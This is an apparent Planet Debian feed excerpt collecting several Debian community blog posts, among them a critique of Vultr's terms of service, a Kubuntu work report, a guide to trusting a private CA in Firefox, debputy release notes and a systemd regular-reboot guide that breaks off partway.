Planet Debianhttps://planet.debian.org/atom.xml2024-03-29T04:46:17+00:00http://intertwingly.net/code/venus/the vulture in the coal minehttp://joeyh.name/blog/entry/the_vulture_in_the_coal_mine/2024-03-28T22:37:48+00:00<p>Turns out that VPS provider Vultr's
<a href="http://web.archive.org/web/20240305043015/https://www.vultr.com/legal/tos/">terms of service</a>
were quietly changed some time ago to give them a "perpetual, irrevocable"
license to use content hosted there in any way, including modifying it and
commercializing it "for purposes of providing the Services to you."</p>
<p>This is very similar to changes that
<a href="http://joeyh.name/blog/entry/removing_everything_from_github/">Github made to their TOS in 2017</a>.
Since then, Github has been
rebranded as "The world’s leading AI-powered developer platform".
The language in their TOS now clearly lets them use content stored in
Github for training AI. (Probably this is their second line of
defense if the current attempt to legitimise copyright laundering
via generative AI fails.)</p>
<p>Vultr is currently in damage control mode, accusing their concerned
customers of spreading "conspiracy theories"
(-- <a href="https://lowendtalk.com/discussion/comment/3932710/#Comment_3932710">founder David Aninowsky</a>)
and updating the TOS to remove some of the problem language.
Although it still allows them to "make derivative works",
so could still allow their AI division to scrape VPS images
for training data.</p>
<p>Vultr claims this was the legalese version of technical debt,
that it only ever applied to posts in a forum
(not supported by the actual TOS language) and basically
that they and their lawyers are incompetant but not malicious.</p>
<p>Maybe they are indeed incompetant. But even if I give them the benefit of
the doubt, I expect that many other VPS providers, especially ones
targeting non-corporate customers, are watching this closely. If Vultr is
not significantly harmed by customers jumping ship, if the latest TOS
change is accepted as good enough, then other VPS providers will know that
they can try this TOS trick too. If Vultr's AI division does well, others
will wonder to what extent it is due to having all this juicy training
data.</p>
<p>For small self-hosters, this seems like a good time to make sure you're
using a VPS provider you can actually trust to not be eyeing your disk
image and salivating at the thought of stripmining it for decades of
emails. Probably also worth thinking about moving to bare metal hardware,
perhaps hosted at home.</p>
<p>I wonder if this will finally make it worthwhile to mess around with VPS TPMs?</p>Joey Hesshttp://joeyh.name/blog/Kubuntu, KDE Report. In Loving Memory of my Son.https://www.scarlettgatelymoore.dev/?p=4312024-03-28T17:54:44+00:00<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
</div></figure>
<p><strong>Personal:</strong></p>
<p>As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. Mason was Billy’s world and I would like to make sure Mason is taken care of. I have set up a gofundme for Mason and all proceeds will go to the future care of him. </p>
<p><a href="https://gofund.me/25dbff0c">https://gofund.me/25dbff0c</a></p>
<p class="has-text-align-center"><strong>Work report</strong></p>
<p><strong>Kubuntu:</strong></p>
<p>Bug bashing! I am triaging allthebugs for Plasma which can be seen here:</p>
<p><a href="https://bugs.launchpad.net/plasma-5.27/+bug/2053125">https://bugs.launchpad.net/plasma-5.27/+bug/2053125</a></p>
<p>I am happy to report many of the remaining bugs have been fixed in the latest bug fix release 5.27.11.</p>
<p>I prepared <a href="https://kde.org/announcements/plasma/5/5.27.11/">https://kde.org/announcements/plasma/5/5.27.11/</a> and Rik uploaded to archive, thank you. Unfortunately, this and several other key fixes are stuck in transition do to the time_t64 transition, which you can read about here: <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">https://wiki.debian.org/ReleaseGoals/64bit-time</a> . It is the biggest transition in Debian/Ubuntu history and it couldn’t come at a worst time. We are aware our ISO installer is currently broken, calamares is one of those things stuck in this transition. There is a workaround in the comments of the bug report: <a href="https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795">https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795</a></p>
<p>Fixed an issue with plasma-welcome.</p>
<p>Found the fix for emojis and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks!</p>
<p>I have received an <a href="https://kfocus.org/spec/spec-ir14.html">https://kfocus.org/spec/spec-ir14.html</a> laptop and it is truly a great machine and is now my daily driver. A big thank you to the Kfocus team! I can’t wait to show it off at <a href="https://linuxfestnorthwest.org/">https://linuxfestnorthwest.org/</a>.</p>
<p><strong>KDE Snaps:</strong></p>
<p>You will see the activity in this ramp back up as the KDEneon Core project is finally a go! I will participate in the project with part time status and get everyone in the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package plasma, and most importantly I will focus on documentation for future contributors.</p>
<p>I have created the ( now split ) qt6 with KDE patchset support and KDE frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple versions track support and core24 support.</p>
<figure class="wp-block-image size-large"><img alt="" class="has-transparency wp-image-433" height="712" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/ark_qt6_snap-1024x712.png" width="1024" /></figure>
<p>I have successfully created our first qt6/kf6 snap ark. They will show showing up in the store once all the required bits have been merged and published.</p>
<p>Thank you for stopping by.</p>
<p>~Scarlett</p>sgmoorehttps://www.scarlettgatelymoore.devgit grudgehttp://blog.sesse.net/blog/tech/2024-03-27-18-56_git_grudge.html2024-03-27T17:56:00+00:00<p>Small teaser:</p>
<p>Probably won't show up in aggregators (try <a href="https://asciinema.org/a/EtvHDRX3EaXKPq6mt1zuX1TyL">this link</a> instead).</p>Steinar H. Gundersonhttp://blog.sesse.net/Adding a private / custom Certificate Authority to the firefox trust storehttp://00formicapunk00.wordpress.com/?p=1712024-03-26T18:43:00+00:00<div class="wp-block-jetpack-markdown"><p>Today at $WORK I needed to add the private company Certificate Authority (CA) to Firefox, and I found the steps were unnecessarily complex.
Time to blog about that, and I also made a <a href="https://wiki.debian.org/Firefox/PrivateCertificateAuthority">Debian wiki article</a> of that post, so that future generations can update the information, when Firefox 742 is released on Debian 17.</p>
<p>The <a href="http://www.cacert.org">cacert certificate authority</a> is not included in Debian and Firefox, and is thus a good example of adding a private CA.
Note that this does not mean I specifically endorse that CA.</p>
<ul>
<li>Test that SSL connections to a site signed by the private CA is failing</li>
</ul>
<pre><code>$ gnutls-cli wiki.cacert.org:443
...
- Status: The certificate is NOT trusted. The certificate issuer is unknown.
*** PKI verification of server certificate failed...
*** Fatal error: Error in the certificate.
</code></pre>
<ul>
<li>Download the private CA</li>
</ul>
<pre><code>$ wget http://www.cacert.org/certs/root_X0F.crt
</code></pre>
<ul>
<li>test that a connection works with the private CA</li>
</ul>
<pre><code>$ gnutls-cli --x509cafile root_X0F.crt wiki.cacert.org:443
...
- Status: The certificate is trusted.
- Description: (TLS1.2-X.509)-(ECDHE-SECP256R1)-(RSA-SHA256)-(AES-256-GCM)
- Session ID: 37:56:7A:89:EA:5F:13:E8:67:E4:07:94:4B:52:23:63:1E:54:31:69:5D:70:17:3C:D0:A4:80:B0:3A:E5:22:B3
- Options: safe renegotiation,
- Handshake was completed
...
</code></pre>
<ul>
<li>add the private CA to the Debian trust store located in <code>/etc/ssl/certs/ca-certificates.crt</code></li>
</ul>
<pre><code>$ sudo cp root_X0F.crt /usr/local/share/ca-certificates/cacert-org-root-ca.crt
$ sudo update-ca-certificates --verbose
...
Adding debian:cacert-org-root-ca.pem
...
</code></pre>
<ul>
<li>verify that we can connect without passing the private CA on the command line</li>
</ul>
<pre><code>$ gnutls-cli wiki.cacert.org:443
...
- Status: The certificate is trusted.
</code></pre>
<ul>
<li>
<p>At that point most applications are able to connect to systems with a certificate signed by the private CA (curl, Gnome builtin Browser …). However Firefox is using its own
trust store and will still display a security error if connecting to <a href="https://wiki.cacert.org" rel="nofollow">https://wiki.cacert.org</a>. To make Firefox trust the Debian trust store, we need to add a so called <a href="https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox"><code>security device</code></a>, in fact an extra library wrapping the Debian trust store. The library will wrap the Debian trust store in the PKCS#11 industry format that Firefox supports.</p>
</li>
<li>
<p>install the pkcs#11 wrapping library and command line tools</p>
</li>
</ul>
<pre><code>$ sudo apt install p11-kit p11-kit-modules
</code></pre>
<ul>
<li>verify that the private CA is accessible via PKCS#11</li>
</ul>
<pre><code>$ trust list | grep --context 2 'CA Cert'
pkcs11:id=%16%B5%32%1B%D4%C7%F3%E0%E6%8E%F3%BD%D2%B0%3A%EE%B2%39%18%D1;type=cert
type: certificate
label: CA Cert Signing Authority
trust: anchor
category: authority
</code></pre>
<ul>
<li>now we need to add a new security device in Firefox pointing to the pkcs11 trust store. The pkcs11 trust store is located in <code>/usr/lib/x86_64-linux-gnu/pkcs11/p11-kit-trust.so</code></li>
</ul>
<pre><code>$ dpkg --listfiles p11-kit-modules | grep trust
/usr/lib/x86_64-linux-gnu/pkcs11/p11-kit-trust.so
</code></pre>
<ul>
<li>
<p>in Firefox (tested in version 115 esr), go to Settings -> Privacy & Security -> Security -> Security Devices.<br />
Then click “Load”, in the popup window use “My local trust” as a module name, and <code>/usr/lib/x86_64-linux-gnu/pkcs11/p11-kit-trust.so</code> as a module filename.
After adding the module, you should see it in the list of Security Devices, having <code>/etc/ssl/certs/ca-certificates.crt</code> as a description.</p>
</li>
<li>
<p>now restart Firefox and you should be able to browse <a href="https://wiki.cacert.org" rel="nofollow">https://wiki.cacert.org</a> without security errors</p>
</li>
</ul>
</div>Manuhttps://00formicapunk00.wordpress.coma bug a dayhttps://jmtd.net/log/a_bug_a_day/2024-03-25T16:58:29+00:00<p>I recently became a maintainer of/committer to <a href="https://ikiwiki.info">IkiWiki</a>,
the software that powers my site. I also took over maintenance of the Debian
package. Last week I cut a new upstream point release, <a href="https://ikiwiki.info/news/version_3.20200202.4/">3.20200202.4</a>, and a
corresponding Debian package upload, consisting only of a handful of
low-hanging-fruit patches from other people, largely to exercise both
processes.</p>
<p>I've been discussing IkiWiki's maintenance situation with some other users for
a couple of years now. I've also weighed up the pros and cons of moving to a
different static-site-generator (a term that describes what IkiWiki is, but was
actually coined more recently). It turns out IkiWiki is exceptionally flexible and
powerful: I estimate the cost of moving to something modern(er) and fashionable
such as Jekyll, Hugo or Hakyll as unreasonably high, in part because they are
surprisingly rigid and inflexible in some key places.</p>
<p>Like most mature software, IkiWiki has a bug backlog. Over the past couple of
weeks, as a sort-of "palate cleanser" around work pieces, I've tried to triage
one IkiWiki bug per day: either <a href="https://ikiwiki.info/bugs/">upstream</a> or <a href="https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=ikiwiki;dist=unstable">in
the Debian Bug
Tracker</a>.
This is a really lightweight task: it can be as simple as "find a bug reported in
Debian, copy it upstream, tag it <code>upstream</code>, mark it <code>forwarded</code>; perhaps taking
5-10 minutes.</p>
<p>Often I'll stumble across something that has already been fixed but not recorded
as such as I go.</p>
<p>Despite this minimal level of work, I'm quite satisfied with the cumulative
progress. It's notable to me how much my perspective has shifted by becoming a
maintainer: I'm considering everything through a different lens to that of being
just one user.</p>
<p>Eventually I will put some time aside to scratch some of my own itches (html5 by
default; support dark mode; duckduckgo plugin; use the <code>details</code> tag...) but for
now this minimal exercise is of broader use.</p>jmtdhttps://jmtd.net/log/Piecepack and postcard boxeshttps://blog.trueelena.org/blog/2023/11/04-piecepack_and_postcard_boxes/index.html2024-03-25T00:00:00+00:00<article>
<section class="header">
Posted on March 25, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Abits.html" title="All pages tagged 'madeof:bits'.">madeof:bits</a>, <a href="https://blog.trueelena.org/tags/craft%3Acartonnage.html" title="All pages tagged 'craft:cartonnage'.">craft:cartonnage</a>
</section>
<section>
<blockquote>
<p>This article has been originally posted on November 4, 2023, and has
been updated (at the bottom) since.</p>
</blockquote>
<p><img alt="An open cardboard box, showing the lining in paper printed with a medieval music manuscript." class="align-center" src="https://blog.trueelena.org/blog/2023/11/04-piecepack_and_postcard_boxes/empty_box.jpg" style="width: 80.0%;" /></p>
<p>Thanks to All Saints’ Day, I’ve just had a 5 days weekend. One of those
days I woke up and decided I absolutely needed a cartonnage box for the
cardboard and linocut <a href="https://piecepack.net/">piecepack</a> I’ve been working on for quite some
time.</p>
<p>I started drawing a plan with measures before breakfast, then decided to
change some important details, restarted from scratch, did a quick dig
through the bookbinding materials and settled on 2 mm cardboard for the
structure, black fabric-like paper for the outside and a scrap of paper
with a manuscript print for the inside.</p>
<p>Then we had the only day with no rain among the five, so some time was
spent doing things outside, but on the next day I quickly finished two
boxes, at two different heights.</p>
<p>The weather situation also meant that while I managed to take passable
pictures of the first stages of the box making in natural light, the
last few stages required some creative artificial lightning, even if it
wasn’t that late in the evening. I need to build<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a> myself a
light box.</p>
<p>And then decided that since they are C6 sized, they also work well for
postcards or for other A6 pieces of paper, so I will probably need
to make another one when the piecepack set will be finally finished.</p>
<p>The original plan was to use a linocut of the piecepack suites as the
front cover; I don’t currently have one ready, but will make it while
printing the rest of the piecepack set. One day :D</p>
<p><img alt="an open rectangular cardboard box, with a plastic piecepack set in it." class="align-center" src="https://blog.trueelena.org/blog/2023/11/04-piecepack_and_postcard_boxes/piecepack_box.jpg" style="width: 80.0%;" /></p>
<p>One of the boxes was temporarily used for the plastic piecepack I got
with the <a href="https://openlibrary.org/books/OL27512510M/The_Infinite_Board_Game">book</a>, and that one works well, but since it’s a set with
standard suites I think I will want to make another box, using some of
the paper with fleur-de-lis that I saw in the stash.</p>
<p>I’ve also started to write detailed instructions: I will publish them as
soon as they are ready, and then either update this post, or they will
be mentioned in an additional post if I will have already made more
boxes in the meanwhile.</p>
<hr />
<p>Update 2024-03-25: the instructions have been published <a href="https://craft-patterns.trueelena.org/bookbinding/cartonnage/simple_box/index.html">on my craft
patterns website</a></p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>you don’t really expect me to <em>buy</em> one, right? :D<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>Elena “of Valhalla”https://blog.trueelena.orgTesting againhttps://weeraman.com/rss/660046b0dc9ef0000115075b2024-03-24T15:29:55+00:00<p>123</p>Anuradha Weeramanhttps://weeraman.com/This is a testhttps://weeraman.com/rss/660045fedc9ef0000115073a2024-03-24T15:26:22+00:00<img alt="This is a test" src="https://images.unsplash.com/photo-1682687982183-c2937a74257c?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wxfDF8YWxsfDF8fHx8fHwyfHwxNzExMjkyNDkzfA&ixlib=rb-4.0.3&q=80&w=2000" /><p>Testing 1 2 3</p>Anuradha Weeramanhttps://weeraman.com/debputy v0.1.21tag:people.debian.org,2024-03-24:/~nthykier/blog/2024/debputy-v0-1-21.html2024-03-24T14:30:37+00:00<p>Earlier today, I have just released <tt class="docutils literal">debputy</tt> version 0.1.21
to Debian unstable. In the blog post, I will highlight some
of the new features.</p>
<div class="section" id="package-boilerplate-reduction-with-automatic-relationship-substvar">
<h2>Package boilerplate reduction with automatic relationship substvar</h2>
<p>Last month, I started a discussion on rethinking how we do
relationship substvars such as the <tt class="docutils literal">${misc:Depends}</tt>. These
generally ends up being boilerplate runes in the form of
<tt class="docutils literal">Depends: ${misc:Depends}, ${shlibs:Depends}</tt> where you
as the packager has to remember exactly which runes apply
to your package.</p>
<p>My proposed solution was to automatically apply these substvars
and this feature has now been implemented in <tt class="docutils literal">debputy</tt>. It is
also combined with the feature where essential packages should
use <tt class="docutils literal"><span class="pre">Pre-Depends</span></tt> by default for <tt class="docutils literal"><span class="pre">dpkg-shlibdeps</span></tt> related
dependencies.</p>
<p>I am quite excited about this feature, because I noticed with
<tt class="docutils literal">libcleri</tt> that we are now down to 3-5 fields for defining
a simple library package. Especially since <em>most</em> C library
packages are trivial enough that <tt class="docutils literal">debputy</tt> can auto-derive
them to be <tt class="docutils literal"><span class="pre">Multi-Arch:</span> same</tt>.</p>
<p>As an example, the <tt class="docutils literal">libcleric1</tt> package is down to 3
fields (<tt class="docutils literal">Package</tt>, <tt class="docutils literal">Architecture</tt>, <tt class="docutils literal">Description</tt>)
with <tt class="docutils literal">Section</tt> and <tt class="docutils literal">Priority</tt> being inherited from the
<tt class="docutils literal">Source</tt> stanza. I have submitted a MR to show case the
boilerplate reduction at
<a class="reference external" href="https://salsa.debian.org/siridb-team/libcleri/-/merge_requests/3">https://salsa.debian.org/siridb-team/libcleri/-/merge_requests/3</a>.</p>
<p>The removal of <tt class="docutils literal">libcleric1 (= ${binary:Version})</tt> in that MR
relies on another existing feature where <tt class="docutils literal">debputy</tt> can auto-derive
a dependency between an <em>arch:any</em> <tt class="docutils literal"><span class="pre">-dev</span></tt> package and the library
package based on the <tt class="docutils literal">.so</tt> symlink for the shared library.
The <em>arch:any</em> restriction comes from the fact that <em>arch:all</em> and
<em>arch:any</em> packages are not built together, so <tt class="docutils literal">debputy</tt> cannot
reliably see across the package boundaries during the build (and
therefore refuses to do so at all).</p>
<p>Packages that have already migrated to <tt class="docutils literal">debputy</tt> can use
<tt class="docutils literal">debputy <span class="pre">migrate-from-dh</span></tt> to detect any unnecessary
relationship substitution variables in case you want to clean
up. The removal of <tt class="docutils literal"><span class="pre">Multi-Arch:</span> same</tt> and intra-source
dependencies must be done manually and so only be done so
when you have validated that it is safe and sane to do. I was
willing to do it for the show-case MR, but I am less confident
that would bother with these for existing packages in general.</p>
<p>Note: I summarized the discussion of the automatic relationship
substvar feature earlier this month in
<a class="reference external" href="https://lists.debian.org/debian-devel/2024/03/msg00030.html">https://lists.debian.org/debian-devel/2024/03/msg00030.html</a>
for those who want more details.</p>
<p>PS: The automatic relationship substvars feature will also
appear in <tt class="docutils literal">debhelper</tt> as a part of compat 14.</p>
</div>
<div class="section" id="language-server-lsp-and-linting">
<h2>Language Server (LSP) and Linting</h2>
<p>I have long been frustrated by our poor editor support for Debian packaging files.
To this end, I started working on a Language Server (LSP) feature in <tt class="docutils literal">debputy</tt>
that would cover some of our standard Debian packaging files. This release
includes the first version of said language server, which covers the following
files:</p>
<blockquote>
<ul class="simple">
<li>debian/control</li>
<li>debian/copyright (the machine readable variant)</li>
<li>debian/changelog (mostly just spelling)</li>
<li>debian/rules</li>
<li>debian/debputy.manifest (syntax checks only; use <tt class="docutils literal">debputy <span class="pre">check-manifest</span></tt>
for the full validation for now)</li>
</ul>
</blockquote>
<p>Most of the effort has been spent on the Deb822 based files such as debian/control,
which comes with diagnostics, quickfixes, spellchecking (but only for relevant fields!),
and completion suggestions.</p>
<p>Since not everyone has a LSP capable editor and because sometimes you just want
diagnostics without having to open each file in an editor, there is also a batch
version for the diagnostics via <tt class="docutils literal">debputy lint</tt>. Please see <tt class="docutils literal">debputy(1)</tt> for
how <tt class="docutils literal">debputy lint</tt> compares with <tt class="docutils literal">lintian</tt> if you are curious about which
tool to use at what time.</p>
<p>To help you getting started, there is a now <tt class="docutils literal">debputy lsp <span class="pre">editor-config</span></tt> command that
can provide you with the relevant editor config glue. At the moment, <tt class="docutils literal">emacs</tt> (via
<tt class="docutils literal">eglot</tt>) and <tt class="docutils literal">vim</tt> with <tt class="docutils literal"><span class="pre">vim-youcompleteme</span></tt> are supported.</p>
<p>For those that followed the previous blog posts on writing the language server, I would
like to point out that the command line for running the language server has changed
to <tt class="docutils literal">debputy lsp server</tt> and you no longer have to tell which format it is. I have
decided to make the language server a "polyglot" server for now, which I will
hopefully not regret... Time will tell. :)</p>
<p>Anyhow, to get started, you will want:</p>
<div class="highlight"><pre><span></span><span class="gp">$ </span>apt<span class="w"> </span>satisfy<span class="w"> </span><span class="s1">'dh-debputy (>= 0.1.21~), python3-pygls'</span>
<span class="gp"># </span>Optionally,<span class="w"> </span><span class="k">for</span><span class="w"> </span>spellchecking
<span class="gp">$ </span>apt<span class="w"> </span>install<span class="w"> </span>python3-hunspell<span class="w"> </span>hunspell-en-us
<span class="gp"># </span>For<span class="w"> </span>emacs<span class="w"> </span>integration
<span class="gp">$ </span>apt<span class="w"> </span>install<span class="w"> </span>elpa-dpkg-dev-el<span class="w"> </span>markdown-mode-el
<span class="gp"># </span>For<span class="w"> </span>vim<span class="w"> </span>integration<span class="w"> </span>via<span class="w"> </span>vim-youcompleteme
<span class="gp">$ </span>apt<span class="w"> </span>install<span class="w"> </span>vim-youcompleteme
</pre></div>
<p>Specifically for <tt class="docutils literal">emacs</tt>, I also learned two things <em>after</em> the upload. First, you
can auto-activate <tt class="docutils literal">eglot</tt> via <tt class="docutils literal"><span class="pre">eglot-ensure</span></tt>. This badly feature interacts with
<tt class="docutils literal">imenu</tt> on <tt class="docutils literal">debian/changelog</tt> for reasons I do not understand (causing a several
second start up delay until something times out), but it works fine for the other
formats. Oddly enough, opening a changelog file and <em>then</em> activating <tt class="docutils literal">eglot</tt> does
not trigger this issue at all. In the next version, editor config for emacs will
auto-activate <tt class="docutils literal">eglot</tt> on all files except <tt class="docutils literal">debian/changelog</tt>.</p>
<p>The second thing is that if you install <tt class="docutils literal"><span class="pre">elpa-markdown-mode</span></tt>, <tt class="docutils literal">emacs</tt> will accept
and process markdown in the hover documentation provided by the language server.
Accordingly, the editor config for <tt class="docutils literal">emacs</tt> will also mention this package from
the next version on.</p>
<p>Finally, on a related note, Jelmer and I have been looking at moving some of this
logic into a new package called <tt class="docutils literal"><span class="pre">debpkg-metadata</span></tt>. The point being to support
easier reuse of linting and LSP related metadata - like pulling a list of known
fields for debian/control or sharing logic between <tt class="docutils literal"><span class="pre">lintian-brush</span></tt> and
<tt class="docutils literal">debputy</tt>.</p>
</div>
<div class="section" id="minimal-integration-mode-for-rules-requires-root">
<h2>Minimal integration mode for Rules-Requires-Root</h2>
<p>One of the original motivators for starting <tt class="docutils literal">debputy</tt> was to be able to get rid of
<tt class="docutils literal">fakeroot</tt> in our build process. While this is possible, <tt class="docutils literal">debputy</tt> currently does
not support most of the complex packaging features such as maintscripts and debconf.
Unfortunately, the kind of packages that need <tt class="docutils literal">fakeroot</tt> for static ownership tend
to also require very complex packaging features.</p>
<p>To bridge this gap, the new version of <tt class="docutils literal">debputy</tt> supports a very minimal integration
with <tt class="docutils literal">dh</tt> via the <tt class="docutils literal"><span class="pre">dh-sequence-zz-debputy-rrr</span></tt>. This integration mode keeps
the vast majority of <tt class="docutils literal">debhelper</tt> sequence in place meaning most <tt class="docutils literal">dh</tt> add-ons
will continue to work with <tt class="docutils literal"><span class="pre">dh-sequence-zz-debputy-rrr</span></tt>. The sequence only
replaces the following commands:</p>
<blockquote>
<ul class="simple">
<li>dh_fixperms</li>
<li>dh_gencontrol</li>
<li>dh_md5sums</li>
<li>dh_builddeb</li>
</ul>
</blockquote>
<p>The <tt class="docutils literal">installations</tt> feature of the manifest will be disabled in this integration
mode to avoid feature interactions with <tt class="docutils literal">debhelper</tt> tools that expect
<tt class="docutils literal"><span class="pre">debian/<pkg></span></tt> to contain the materialized package.</p>
<p>On a related note, the <tt class="docutils literal">debputy <span class="pre">migrate-from-dh</span></tt> command now supports a
<tt class="docutils literal"><span class="pre">--migration-target</span></tt> option, so you can choose the desired level of integration
without doing code changes. The command will attempt to auto-detect the desired
integration from existing package features such as a build-dependency on a relevant
<tt class="docutils literal">dh</tt> sequence, so you do not have to remember this new option every time once
the migration has started. :)</p>
</div>Niels Thykierhttps://people.debian.org/~nthykier/blog/CISPE's call for new regulations on VMwaretag:https:,2024:id_4692024-03-24T12:52:12+00:00<p>A few days ago <a href="https://cispe.cloud/">CISPE</a>, a trade association of European cloud providers, published a <a href="https://cispe.cloud/broadcoms-brutal-contract-termination-and-imposition-of-prohibitive-new-licensing-terms-will-decimate-europes-cloud-infrastructure/">press release complaining about the new VMware licensing scheme and asking for regulators and legislators to intervene</a>.</p>
<p>But VMware does not have a monopoly on virtualization software: I think that asking regulators to interfere is unnecessary and unwise, unless, of course, they wish to question the entire foundations of copyright. Which, on the other hand, could be an intriguing position that I would support...</p>
<p>I believe that over-reliance on a single supplier is a typical enterprise risk: in the past decade some companies have invested in developing their own virtualization infrastructure using free software, while others have decided to rely entirely on a single proprietary software vendor.</p>
<p>My only big concern is that many public sector organizations will continue to use VMware and pay the huge fees designed by Broadcom to extract the maximum amount of money from their customers. However, it is ultimately the citizens who pay these bills, and blaming the evil US corporation is a great way to avoid taking responsibility for these choices.</p>
<blockquote>
<p>"Several CISPE members have stated that without the ability to license and use VMware products they will quickly go bankrupt and out of business."</p>
</blockquote>
<p>Insert here the <a href="https://knowyourmeme.com/memes/oh-no-anyway">Jeremy Clarkson "Oh no! Anyway..." meme</a>.</p>Marco d'Itrihttps://blog.bofh.it/Regular Rebootshttps://tookmund.com/2024/03/regular-reboot2024-03-24T00:00:00+00:00<p>Uptime is often considered a measure of system reliability,
an indication that the running software is stable and can be counted on.</p>
<p>However, this hides the insidious build-up of state throughout the system as
it runs, the slow drift from the expected to the strange.</p>
<p>As Nolan Lawson highlights in an excellent post entitled
<a href="https://nolanlawson.com/2020/12/29/programmers-are-bad-at-managing-state/">Programmers are bad at managing state</a>,
state is the most challenging part of programming.
It’s why “did you try turning it off and on again” is a classic tech support
response to any problem.</p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">You: uptime<br /><br />Me: Every machine gets rebooted at 1AM to clear the slate for maintenance, and at 3:30AM to push through any pending updates.</p>— <a href="https://twitter.com/SwiftOnSecurity/status/1343079557910433797">@SwiftOnSecurity, December 27, 2020</a></blockquote>
<p>In addition to the problem of state, installing regular updates periodically
requires a reboot, even if the rest of the process is automated through a
tool like <a href="https://wiki.debian.org/UnattendedUpgrades">unattended-upgrades</a>.</p>
<p>For my personal homelab, I manage a handful of different machines running
various services.</p>
<p>I used to just schedule a day to update and reboot all of them, but that
got very tedious very quickly.</p>
<p>I then moved the reboot to a cronjob,
and then recently to a systemd timer and service.</p>
<p>I figure that laying out my path to better management of this might help
others, and will almost certainly lead to someone telling me a better way
to do this.</p>
<p>UPDATE: Turns out there’s another option for better systemd cron integration.
See <a href="https://tookmund.com/feed.xml#systemd-cron"><code class="language-plaintext highlighter-rouge">systemd-cron</code></a> below.</p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Ultimately, uptime only measures the duration since you last proved you can turn the machine on and have it boot.</p>— <a href="https://twitter.com/SwiftOnSecurity/status/728812283535626242">@SwiftOnSecurity, May 7, 2016</a></blockquote>
<h2 id="stage-one-reboot-cron">Stage One: Reboot Cron</h2>
<p>The first, and easiest approach, is a simple cron job.
Just adding the following line to <code class="language-plaintext highlighter-rouge">/var/spool/cron/crontabs/root</code><sup id="fnref:cronoptions"><a class="footnote" href="https://tookmund.com/feed.xml#fn:cronoptions" rel="footnote">1</a></sup>
is enough to get your machine to reboot once a month<sup id="fnref:monthly"><a class="footnote" href="https://tookmund.com/feed.xml#fn:monthly" rel="footnote">2</a></sup> on the 6th at 8:00 AM<sup id="fnref:cronformat"><a class="footnote" href="https://tookmund.com/feed.xml#fn:cronformat" rel="footnote">3</a></sup>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0 8 6 * * reboot
</code></pre></div></div>
<p>I had this configured for many years and it works well.
But you have no indication as to whether it succeeds except for checking
your uptime regularly yourself.</p>
<h2 id="stage-two-reboot-systemd-timer">Stage Two: Reboot systemd Timer</h2>
<p>The next evolution of this approach for me was to use a systemd timer.
I created a <code class="language-plaintext highlighter-rouge">regular-reboot.timer</code> with the following contents:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Reboot on a Regular Basis
[Timer]
Unit=regular-reboot.service
OnBootSec=1month
[Install]
WantedBy=timers.target
</code></pre></div></div>
<p>This timer will trigger the <code class="language-plaintext highlighter-rouge">regular-reboot.service</code> systemd unit
when the system reaches one month of uptime.</p>
<p>I’ve seen some guides to creating timer units recommend adding
a <code class="language-plaintext highlighter-rouge">Wants=regular-reboot.service</code> to the <code class="language-plaintext highlighter-rouge">[Unit]</code> section,
but this has the consequence of running that service every time it starts the
timer. In this case that will just reboot your system on startup which is
not what you want.</p>
<p>Care needs to be taken to use the <code class="language-plaintext highlighter-rouge">OnBootSec</code> directive instead of
<code class="language-plaintext highlighter-rouge">OnCalendar</code> or any of the other time specifications, as your system could
reboot, discover its still within the expected window and reboot again.
With <code class="language-plaintext highlighter-rouge">OnBootSec</code> your system will not have that problem.
Technically, this same problem could have occurred with the cronjob approach,
but in practice it never did, as the systems took long enough to come back
up that they were no longer within the expected window for the job.</p>
<p>I then added the <code class="language-plaintext highlighter-rouge">regular-reboot.service</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Reboot on a Regular Basis
Wants=regular-reboot.timer
[Service]
Type=oneshot
ExecStart=shutdown -r 02:45
</code></pre></div></div>
<p>You’ll note that this service is actually scheduling a specific reboot time
via the shutdown command instead of just immediately rebooting.
This is a bit of a hack needed because I can’t control when the timer
runs exactly when using <code class="language-plaintext highlighter-rouge">OnBootSec</code>.
This way different systems have different reboot times so that everything
doesn’t just reboot and fail all at once. Were something to fail to come
back up I would have some time to fix it, as each machine has a few hours
between scheduled reboots.</p>
<p>One you have both files in place, you’ll simply need to reload configuration
and then enable and start the timer unit:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemctl daemon-reload
systemctl enable --now regular-reboot.timer
</code></pre></div></div>
<p>You can then check when it will fire next:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># systemctl status regular-reboot.timer
● regular-reboot.timer - Reboot on a Regular Basis
Loaded: loaded (/etc/systemd/system/regular-reboot.timer; enabled; preset: enabled)
Active: active (waiting) since Wed 2024-03-13 01:54:52 EDT; 1 week 4 days ago
Trigger: Fri 2024-04-12 12:24:42 EDT; 2 weeks 4 days left
Triggers: ● regular-reboot.service
